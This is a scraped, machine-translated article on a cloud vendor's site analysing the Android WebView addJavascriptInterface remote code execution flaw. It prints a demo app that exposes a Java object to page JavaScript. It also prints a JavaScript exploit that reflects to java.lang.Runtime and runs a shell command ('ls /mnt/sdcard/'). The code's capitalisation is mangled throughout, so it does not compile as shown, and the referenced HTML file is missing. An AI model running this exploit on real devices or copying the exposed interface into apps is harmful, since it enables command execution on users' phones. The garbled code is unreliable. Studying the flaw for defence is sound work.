A brief analysis of the remote Code execution vulnerability of Android WebView

Source: Internet
Author: User

0x00

This article refers to the Android WebView Remote Code execution Vulnerability analysis. The code address is, Https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo. Let's analyze the code below.

0x01

First list the Project Project catalog:


The code for Mainactivity.java is as follows:

public class Mainactivity extends Activity {private WebView webview;private Uri muri;private String url;//string mUrl1 = " File:///android_asset/html/attack_file.html "; String mUrl2 = "file:///android_asset/html/test.html"; @Overrideprotected void OnCreate (Bundle savedinstancestate) { Super.oncreate (savedinstancestate); Setcontentview (r.layout.activity_main); WebView = (WebView) Findviewbyid ( R.id.webview); Webview.getsettings (). Setjavascriptenabled (True); Webview.addjavascriptinterface (new JSInterface () , "Jsinterface");//webview.getsettings (). Setallowfileaccessfromfileurls (True); Webview.setwebchromeclient (new Webchromeclient () {@Override public boolean onjsalert (WebView view, string URL, string message,jsresult result) {// Required functionality here return Super.onjsalert (view, URL, message, result);});    Webview.loadurl (MURL2);}            Class Jsinterface {public String OnButtonClick (string text) {Final String str = text;        Runonuithread (New Runnable () {        @Override public void Run () {LOG.E ("leehong2", "onbuttonclick:text =" + str);                Toast.maketext (Getapplicationcontext (), "onbuttonclick:text =" + str, toast.length_long). Show ();                        }            });  Return "This text was returned from Java layer.        JS Text = "+ text; } public void Onimageclick (String url, int width, int height) {final String str = "Onimageclick            : Text = "+ URL +" width = "+ width +" height = "+ height;            LOG.I ("Leehong2", str); Runonuithread (New Runnable () {@Override public void run () {Toast.makete                XT (Getapplicationcontext (), str, toast.length_long). Show ();        }            }); }    }}
The following code sets the WebView loaded HTML to interact with Java code through JavaScript.

Webview.getsettings (). Setjavascriptenabled (True); Webview.addjavascriptinterface (new Jsinterface (), "JSInterface" );


We then look at the loaded HTML file, which is located in the Aessets directory.
Webview.loadurl (MURL2);


Test.html as follows:

For an introduction to HTML and JavaScript, please refer to http://www.w3school.com.cn/html/html_getstarted.asp.

The main cause of the vulnerability in this is the following code:

function Execute (Cmdargs)       {for        (var obj in window) {            console.log (window[obj]);            if ("GetClass" in Window[obj]) {                alert (obj);                Return Window[obj].getclass (). forname ("Java.lang.Runtime"). GetMethod ("GetRuntime", null). Invoke (Null,null). EXEC ( Cmdargs);             }}} var p = execute (["LS", "/mnt/sdcard/"]);
An attacker could find an object that has a "getclass" method, then use a reflection mechanism to get the Java runtime object and then invoke a static method to execute the system command. thereby causing harm.

The detailed function of this program please download the code to run and then know.

A brief analysis of the remote Code execution vulnerability of Android WebView

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.